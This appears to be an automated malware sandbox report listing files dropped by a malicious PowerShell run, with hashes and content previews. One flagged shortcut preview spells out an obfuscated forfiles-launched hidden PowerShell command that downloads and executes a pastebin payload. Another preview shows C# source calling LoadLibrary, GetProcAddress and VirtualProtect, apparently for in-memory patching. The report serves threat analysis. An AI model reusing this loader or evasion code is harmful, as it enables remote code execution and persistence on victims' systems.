                                                                          • 185.199.110.133

                                                                          Dropped Files

                                                                          No context

                                                                          Created / dropped Files

                                                                          C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                          Category:dropped
                                                                          Size (bytes):1728
                                                                          Entropy (8bit):4.527272298423835
                                                                          Encrypted:false
                                                                          SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                          MD5:724AA21828AD912CB466E3B0A79F478B
                                                                          SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                          SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                          SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                                                          Malicious:true
                                                                          Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):11608
                                                                          Entropy (8bit):4.890472898059848
                                                                          Encrypted:false
                                                                          SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                                                          MD5:66B287A82D897FD706FD1C8A5098E8A5
                                                                          SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                                                          SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                                                          SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:NlllulA1lZ:NllUA1
                                                                          MD5:CA2896B35E1CF77A7FCD11CFCFBFBDD2
                                                                          SHA1:43CF82D8C3296285A8E46383D6F8FF13D5FC2976
                                                                          SHA-256:C9B80B07EECC991180644073C37F4725837CB3061A12659CF3B0B0783628F070
                                                                          SHA-512:AC13AD42533715626D74FED366F8209B7C43515AA1606684DD2166ED16DC949BA1D6AD6A0953664C6D9F49DCE1CEE180D3299B5BC4D51B6DCD4AC5989FEF055D
                                                                          Malicious:false
                                                                          Preview:@...e...............................R.. .............@..........

                                                                          C:\Users\user\AppData\Local\Temp\RES226F.tmp

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 17:28:37 2024, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1328
                                                                          Entropy (8bit):3.965447318248926
                                                                          Encrypted:false
                                                                          SSDEEP:24:Hge9ERrwZFnrEwZHJwKTFjmNII+ycuZhN1akSjPNnqSqd:swZBrEwZSKTRmu1ul1a3JqSK
                                                                          MD5:3ABBED86FBB2E3786CB638507985A498
                                                                          SHA1:EC7B182CC205817E9F494F52BB7F75475185D42F
                                                                          SHA-256:44BF5AD649EC2F9E52291A39EC41F79FE183D8FCBF5CC665AF96D98AEBD96DD0
                                                                          SHA-512:5BE7A3E3B5C3A1C9C2A696214EFE0CB72FF9A8D7D84176966C7A11A22B57CCE979A44F0C0F88412292421B4B4782DF3E8DB2FBD625CF1840A2322685F4B87F10
                                                                          Malicious:false
                                                                          Preview:L...E..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP......................D...9...<0...........3.......C:\Users\user\AppData\Local\Temp\RES226F.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.2.2.p.n.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vt1njhw.l5z.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duella44.3bt.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fps1o4dd.m4y.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzvgc3y5.1oh.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moy1c5vo.edq.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spd1bubh.s1m.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5otmg10.w5x.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xunlmf0m.d2i.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0qxq1t3.dni.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yju5mmtr.vps.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\r422pnl3\CSC544D18D68EB4FCE8319BF18EEFBBF9E.TMP

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.0929007219533613
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXak7YnqqjPN5Dlq5J:+RI+ycuZhN1akSjPNnqX
                                                                          MD5:091C0DA1C2441FAF9A3982F5053C30B6
                                                                          SHA1:536BB1B180C1C4BB718B1EC4FCA6253A58EEB4DE
                                                                          SHA-256:40C28629B05E10DFA3C2462F9BCBB1371FB1A21ACAFE63A4E04BE5CDAC9D62AA
                                                                          SHA-512:57D71970B40A4B977E875CC50C10937C73E6509DE8A1EAF50554ABB49A7947DF2B00E2EDF072CCBECCA124E5FEA05255A9F65ACA1E0437DB446211A34A134BA4
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.2.2.p.n.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.4.2.2.p.n.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                          C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.0.cs

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text
                                                                          Category:dropped
                                                                          Size (bytes):1140
                                                                          Entropy (8bit):4.751587839856729
                                                                          Encrypted:false
                                                                          SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                          MD5:FE35992F552A2057291C867108A5C2EB
                                                                          SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                          SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                          SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                          C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.cmdline

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):367
                                                                          Entropy (8bit):5.219882881732403
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fdu5Iqzxs7+AEszIqLTwi23fdu5IP:p37Lvkmb6KbwZFIWZEmwZFaA
                                                                          MD5:DF2766AEA85E0768A482802C8B157E92
                                                                          SHA1:999B5CBF7700FB3789135FD428BC3B470357DE78
                                                                          SHA-256:9C76AECF17AE9766BDB7A12AB91FD7932597509433EFAE41CC79E96F8AF1CDB1
                                                                          SHA-512:FE1858FC6F837441522758C6451810AE2DD7AD1BD0AFC35EE6770BB992E1AF358D9D5EE9D1EA69BF7C4B4F68BCBD526192C292965CC0CE1369FE3569CFBDFF6E
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.0.cs"

                                                                          C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4096
                                                                          Entropy (8bit):2.9817341013363814
                                                                          Encrypted:false
                                                                          SSDEEP:48:6FpLNvhfeRPBFL9KhSJJCXumwhvV1ul1a3Jq:CJhfeR5d1VGnK
                                                                          MD5:EB9DAF76FC86AABCD7F7DF3330585716
                                                                          SHA1:EC468D8A0AF9857D7B6685AE8B045CFD42C7D526
                                                                          SHA-256:76F47A4F29A9A26DE759643CABCF8A1363EF222891D995C0774AC569AA4F3311
                                                                          SHA-512:9DF64353C4E5683376E38EACC9480C9CFB4C493248A4672C52A58430061E2AA4F9B6EC182CED2B1D1903CA1A8F5507D96EB7C9A04028D813C1632A08421F827C
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                          C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.out

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):866
                                                                          Entropy (8bit):5.307422486075484
                                                                          Encrypted:false
                                                                          SSDEEP:24:K8Id3ka6KbwZFZEmwZFa1Kax5DqBVKVrdFAMBJTH:Hkka6CwZ7EmwZU1K2DcVKdBJj
                                                                          MD5:5245DB06D64C74CB590617199E5BB76F
                                                                          SHA1:804802B9D3B3DEFED6E1C615FFF264072E2B9D52
                                                                          SHA-256:6D07DB50EC8AC4BF4621E9FE42C5C5079A2E4F8AD83DE6872E572FF9246DC08B
                                                                          SHA-512:58D683D42602993EF46BC592DFB466341A1F2FD840CCDB29AB11CBD4E106BDFBFA671E40706AB52FF6D0C0B392F0BA4B91E7254A21350032C7F6E3C92B76CD37
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r422pnl3\r422pnl3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.7146657465411614
                                                                          Encrypted:false
                                                                          SSDEEP:96:0SEQmCTQ/mugkvhkvCCtx69f/HG69fkHO:0SEQdk5sx6Q6d
                                                                          MD5:800E7B548AB817BC64195A09205B0289
                                                                          SHA1:F48B631AF463875541DC89A2C07FEE30A94A9BBA
                                                                          SHA-256:EA1C9640ABE672BF37B9C16B97AF4DAAB2B98BE0967CECCDB363D2F05DF82302
                                                                          SHA-512:4AD6AF45B5F220E299DE37914153EB38F8744A1413259B4D38773292C0807D0F56D1D230F1C728D0AC459A3E2F82F4AE46810C2F89F997A8EB59D87049CB7D3D
                                                                          Malicious:false
                                                                          Preview:...................................FL..................F.".. ....'GDj...\g......z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...F................t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGOY............................=...A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EWsGOY..............................%.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGOY............................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGOY................................W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGOY......................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGOY......................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGOY..................

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\NHDNA8170SXDI31GUYSA.temp

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):6220
                                                                          Entropy (8bit):3.7146657465411614
                                                                          Encrypted:false
                                                                          SSDEEP:96:0SEQmCTQ/mugkvhkvCCtx69f/HG69fkHO:0SEQdk5sx6Q6d
                                                                          MD5:800E7B548AB817BC64195A09205B0289
                                                                          SHA1:F48B631AF463875541DC89A2C07FEE30A94A9BBA
                                                                          SHA-256:EA1C9640ABE672BF37B9C16B97AF4DAAB2B98BE0967CECCDB363D2F05DF82302
                                                                          SHA-512:4AD6AF45B5F220E299DE37914153EB38F8744A1413259B4D38773292C0807D0F56D1D230F1C728D0AC459A3E2F82F4AE46810C2F89F997A8EB59D87049CB7D3D
                                                                          Malicious:false
